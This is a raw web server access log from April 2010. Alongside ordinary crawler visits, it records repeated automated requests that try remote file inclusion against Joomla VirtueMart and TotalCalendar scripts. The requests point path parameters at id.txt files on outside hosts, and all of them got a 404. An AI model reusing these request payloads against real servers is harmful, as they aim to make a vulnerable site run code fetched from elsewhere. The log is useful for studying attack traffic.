84.38.160.77 - - [20/Apr/2010:12:37:33 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 340 "-""libwww-perl/5.76"
87.250.255.243 - - [20/Apr/2010:12:38:12 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.238 - - [20/Apr/2010:12:38:29 -0500] "GET /costume/thmb7.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.132 - - [20/Apr/2010:12:38:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [20/Apr/2010:12:40:06 -0500] "GET /logs/access_log.1179360000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.120.58.176 - - [20/Apr/2010:12:40:17 -0500] "GET /logs/access_log.1229644800//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:17 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:17 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:19 -0500] "GET /logs/access_log.1229644800//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:19 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:19 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:20 -0500] "GET /logs/access_log.1229644800//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:20 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.831"
75.120.58.176 - - [20/Apr/2010:12:40:20 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
